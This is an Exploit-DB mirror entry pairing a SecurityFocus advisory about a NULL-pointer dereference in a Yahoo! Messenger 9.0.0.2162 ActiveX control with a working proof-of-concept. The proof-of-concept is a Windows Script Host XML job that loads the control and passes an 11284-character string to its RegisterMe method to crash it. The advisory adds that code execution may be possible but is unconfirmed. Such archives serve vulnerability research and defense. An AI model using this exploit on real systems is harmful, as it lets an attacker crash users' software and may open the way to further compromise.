exploit-db-mirror/exploits/windows/dos/33350.xml
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

26 lines
No EOL
845 B
XML

source: http://www.securityfocus.com/bid/37007/info
Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected.
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
<script language='vbscript'>
arg1=String(11284, "A")
target.RegisterMe arg1
</script>
</job>
</package>